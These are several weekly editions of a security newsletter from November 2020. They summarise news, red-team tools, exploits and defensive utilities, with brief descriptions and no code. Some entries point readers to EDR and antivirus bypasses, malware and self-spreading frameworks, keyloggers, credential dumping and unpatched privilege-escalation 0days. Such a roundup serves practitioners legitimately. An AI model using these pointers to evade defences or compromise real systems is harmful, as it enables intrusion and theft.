  • Cobalt Strike 4.2 – Everything but the kitchen sink details the improvements in the most recent release of the commercial red team tool. Many are welcome quality of life additions (better key logging and screenshot support), but there is also good low level improvements for in-memory evasion and templates for artifacts the the named-pipe beacon uses to communicate with post-exploitation jobs. ThreatExpress has the latest malleable C2 additions documented nicely.

Techniques

Tools and Exploits

  • AggressiveProxy is a combination of a .NET 3.5 binary (LetMeOutSharp) and a Cobalt Strike aggressor script (AggressiveProxy.cna). Once LetMeOutSharp is executed on a workstation, it will try to enumerate all available proxy configurations and try to communicate with the Cobalt Strike server over HTTP(s) using the identified proxy configurations. The story behind the tool can be found here.
  • Shellycoat is a utility designed to aid in bypassing User-Mode hooks utilized by AV/NGAV/EDR/Sandboxes/DLP etc. to gain visibility into potentially suspicious actions. It is a DLL or PIC shellcode blob that can be injected into a process and will "clean" that processes ntdll using direct syscalls to remove any hooks. Use this with a custom loader before executing your malicious payload to bypass AV.
  • StandIn is a "small" AD post-compromise toolkit. It allows for all kinds of enumeration including LDAP objects, ASREP, SPNs, Unconstrained/constrained delegation, DC's, Groups Operations, and Machine Object Operations.
  • 1768 K is a tool to decode and dump the configuration of Cobalt Strike beacons from memory from the great Didier Stevens (1768 Kelvin is the melting point of Cobalt).
  • red-kube is a red team cheat sheet based on kubectl commands. As more things get containerized, it's good to know how to break k8s.
  • APKProxyHelper patches an apk for proxying and repacks back to an apk. For iOS the author has a tweak called SSLBypass that does what it says on the tin.
  • SCShell now comes with a Cobalt Strike BOF. Fileless lateral movement was never as easy!
  • Git Large File Storage / Git LFS (git-lfs) - Remote Code Execution (RCE). It's been a while since we heard from Dawid Golunski (3 years?), but he is back with a RCE that can be triggered by a git clone command. Demo here.
  • xpcspy implements bidirectional XPC message interception for iOS and macOS.
  • gsocket is an end-to-end encrypted relay network that allows for advanced features beyond simple TCP and SFTP, like mounting a remote file system. As of now, self-hosting a relay is not an option and all traffic goes through gs.thc.org. Perhaps it's an elaborate honey pot?!
  • Coldfire is a Go malware development framework that includes a lot of the basic functions all good malware needs, from logging to sandbox detection.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • gosecretsdump. Impacket is great, but sometimes it can be really slow. When your NTDS.dit file is measured in GBs, it's time to break out the Go for significant speed boost. Also works on SAM/SYSTEM backups, or even local SAM/SYSTEM if run as SYSTEM.
  • gron transforms JSON into discrete assignments to make it easier to grep for what you want and see the absolute 'path' to it. It eases the exploration of APIs that return large blobs of JSON but have terrible documentation. It may fill gaps that jq can't in your workflow.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-11-16

By: Erik
17 November 2020 at 04:30

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-11-09 to 2020-11-16.

News

  • SO-CON 2020 is a conference by SpecterOps and has great talks lined up for 2020-11-20!
  • What's new in macOS 11, Big Sur!. Apple's latest OS was released last Thursday, and one of the best sources for what's new is the hackintosh subreddit.
  • Apple Silicon M1 Emulating x86 is Still Faster Than Every Other Mac in Single Core Benchmark. Apple released their in house ARM-based chips last week for the 13" MacBook Pro, MacBook Air, and Mac mini. They said it was fast, but this benchmark really shows it. Even emulating x86, a Macbook Air scored higher on single-core performance than a 2020 iMac with an Intel i9-10910 (10 cores at 3.6 GHz). Seriously impressive. In multicore benchmarks, the Mac mini with M1 is surprisingly high on the all time benchmarks list.
  • Can't open apps on macOS: an OCSP disaster waiting to happen. While Apple was making amazing strides with its new silicon, it was also being dragged through the mud for its Gatekeeper implementation. This post is the most honest (spoiler: Apple isn't collecting executable hashes every time you launch them), and discusses the missteps of the implementation. There is a place for this type of security mechanism, but it should be designed with privacy first - especially from a company that plays the privacy card as hard as Apple does. Apple has issued a statement (bottom) with vague promises. At this point, Linux distros are the last OSs left without telemetry baked in (and some distros have it).
  • Big Sur allows apps to bypass firewalls. Apple news again, and this is impressively poor showing. How this got past all the meetings and approvals it must have taken is beyond me. Apple has exempted many Apple applications from being routed through new frameworks on Big Sur that Apple requires 3rd party firewalls to use (no more kexts). I guess Apple was convinced it would help with their mission to have things "just work," but if a user is installing a 3rd party firewall, they probably know what they are doing...
  • Windows 20H2 changes is a comparison of Windows 10 2004 and Windows 10 20H2 installations. Could be a menu of new things to look into for vulnerabilities, or just new legitimate service names to hide your persistence.

Techniques

Tools and Exploits

  • Apollo and Mythic: A Myth Worth Retelling. Apollo was in last weeks edition of this blog, but this post digs into some of the features it has. Apollo + Mythic is a powerful combination.
  • Windows RpcEptMapper Service Insecure Registry Permissions EoP. While only effective against Windows 7, this local privilege escalation vulnerability is a classic case of seeing something strange and digging into it, reading the docs, and coming away with an interesting result.
  • HppDLL enables local password dumping using MsvpPasswordValidate hooks. Explanation here.
  • openedr is free and open source platform allows you to analyze what’s happening across your entire environment at base-security-event level. The repo is a little light on details for now, but this is one to watch.
  • Issue 2075: Windows: Local Spooler CVE-2020-1337 Bypass. Microsoft finally actually patched the local spooler local privilege escalation vulnerability in Windows 10. This issue has a PoC if you come across any machines that don't have the November 2020 patch.
  • COM_Mapper is a tool to create COM class/interface relationships in neo4j. Like BloodHound for COM!
  • aix53l-libc.c. If you are unfortunate enough to gain access to an AIX machine, you can root it easily now with this 0day that exploits a buffer overflow in the handling of locale environment variables.
  • ghinja is a plugin to embed Ghidra Decompiler into Binary Ninja.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • 22120 is a tool to self-host the Internet with an offline archive. Similar to ArchiveBox, SingleFile and WebMemex.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-11-23

By: Erik
23 November 2020 at 23:30

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-11-16 to 2020-11-23.

News

  • SO-CON 2020 was last Friday and had a ton of good talks. Recordings are available on the conference site for 30 days, and YouTube after that.
  • Airbnb Executive Resigned Last Year Over Chinese Request for More Data Sharing. AirBnB is sharing booking data from the moment a reservation is made with China. This gives a lot of lead time to "set up" an apartment or house for surveillance. Any large tech company will soon have to face this decision of what to do about Chinese requests. We have seen how anyone who is unwilling to cooperate is blocked, and then an internal Chinese only copy is propped up.
  • Firefox 83 introduces HTTPS-Only Mode. Long time users of the HTTPS Everywhere extension from the EFF will be happy to have this feature available in the browser itself. This feature attempts to load all pages and resources via HTTPS first, instead of the usual HTTP request, 304 redirect, and HTTPS request flow normally seen. There may also be a speed up as one less request/response has to be processed. Chrome has no plans to implement a similar feature.
  • Standing up for developers: youtube-dl is back. I didn't expect this. Github/Microsoft has reinstated youtube-dl forks that remove the tests using copyright protected material. They have also changed their DCMA takedown process and created a developer defense fund. This is probably the best response I could have hoped for, and while I'm still leery of Microsoft's ultimate intentions with GitHub, for now at least it is a positive relationship.
  • Kali Linux 2020.4 Release. ZSH is now the default shell, a few new tools and version bumps, but the coolest feature is the private partnership with @byt3bl33d3r of the amazing CrackMapExec exclusive to Kali and GitHub sponsors for 30 days after each release.
  • ARM-based macOS can run iOS apps + network traffic/cert store is tied to macOS = perfect for iOS app hacking. This isn't really a new capability, since you could proxy web traffic through Burp on a macOS already. Having it all one one machine makes things slightly easier I suppose.
  • ZeroSSL offers free TLS certificates. Just like Let'sEncrypt, ZeroSSL now offers free 90 days certificates via the ACME protocol, including wildcard certificates.

Techniques

Tools and Exploits

  • Assetnote Wordlists. When performing security testing against an asset, it is vital to have high quality wordlists for content and subdomain discovery. This website provides you with wordlists that are up to date and effective against the most popular technologies on the internet, generated fresh each month!
  • IAMFinder enumerates and finds users and IAM roles in a target AWS account. With only the AWS account number of the targeted account, IAMFinder is able to identify users and roles in that environment. Upon successfully identifying an IAM role, IAMFinder can also check if this role can be assumed anonymously. The tool was developed during a red team exercise and it implemented the technique described in this blog.
  • Ghostwriter v2.0 Release. Ghostwritter is becoming a serious red team management tool. If you haven't looked into it before, it has some great new features that may help your team's workflow. There are adaptors for CobaltStrike and other tools like CobaltStrikeToGhostWriter.
  • BloodHound 4.0 - Azurehound. This is a major feature release for BloodHound, including support for Azure attack primitives in the attack graph with new nodes and edges. There is a nice cheatsheet for the new Azure functionality.
  • SwiftSpy is a macOS keylogger, clipboard monitor, and screenshotter written in Swift. Be aware it will cause TCC (Transparency, Control, and Consent) popups!
  • DInvisibleRegistry is an implementation of the null byte Run key persistence technique implemented in C# with direct syscalls via D/invoke.
  • VDM is a library to manipulate drivers exposing a physical memory read/write primitive to allow the user to call any function in the kernel. Currently the project is using gdrv.sys but can be adapted to use any driver that allows for physical memory read and write by writing 4 wrapper functions.
  • HeapsOfFun, an AMSI VBA bypass via the heap, gets an update for x64. Details here.
  • reg_hunter is a blueteam operational triage registry hunting/forensic tool written in Rust.
  • MachoDecrypt will decrypt mach-o binaries on iOS. Requires a jailbroken iPhone.
  • exclude-cdn a tool to filter out CDN hosts from a list consisting of IP's, URL's, and Domains passed via stdin. Useful for bug bounties or external penetration tests.
  • Kaspersky_Safe_Money_LPE is an 0day in the Kaspersky "Safe Money" protected browser. Pure AV schadenfreude. Demo here.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • screenity. The most powerful screen recorder & annotation tool for Chrome. It can record your desktop as well, and output to gif. Perfect for those PoC gifs!
  • rehex is a cross-platform (Windows, Linux, Mac) hex editor for reverse engineering, and everything else.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-11-30

By: Erik
1 December 2020 at 04:50

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-11-23 to 2020-11-30.

News

Techniques

Tools and Exploits

  • mythic-deploy automates the deployment and configuration of a Mythic server with Terraform and Ansible. Adapt it to meet your red team's needs.
  • grab_beacon_config is a nmap NSE script to parse beacon payloads from cobalt strike servers to show their configurations. Use against your own infrastructure to see what others can tell about your beacons.
  • TinyCheck is a network IOC scanner for smartphones with a self-contained wifi man in the middle capture ability. Currently it alerts on known stalkerware indicators as well as plain text data exfiltration so don't count on it to find that NSO Group rootkit.
  • Set-RBCDBytes will set the msds-allowedtoactonbehalfofotheridentity property on the target with the security descriptor for a supplied user or machine that has an SPN. Where would this be useful? Consider an overprovisioned help desk (or similar) account that has GenericAll over every object in the domain and you want to quickly set the msds-allowedtoactonbehalfofotheridentity property on a specific target without importing all of PowerView. This is the script you need! SharpAllowedToAct is the C# variant, and more information on the technique can be found here.
  • clean_wordlist.sh is great for cleaning up some of the noise from last week's AssetNote's wordlists.
  • s3_objects_check is a script to check S3 object permissions in order to identify publicly accessible objects. The script requires two accounts, one with read access to S3 and one with no access to S3.
  • cloudquery transforms your cloud infrastructure into queryable SQL tables for easy monitoring, governance and security. Think osquery for the cloud.
  • Neurax. Redcode labs keeps the Go based malware libraries coming with Neurax, library for constructing self-spreading binaries.
  • NetworkSniffer will log ALL traffic for any iOS application. This includes WKWebView and UIWebView, and no certificate pinning bypass is required! Requires a jailbroken iPhone.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • Tigard is a one-stop-shop for all your hardware hacking needs.
  • DbgShell is a PowerShell front-end for the Windows debugger engine.

This post is cross-posted on SIXGEN's blog.

❌
❌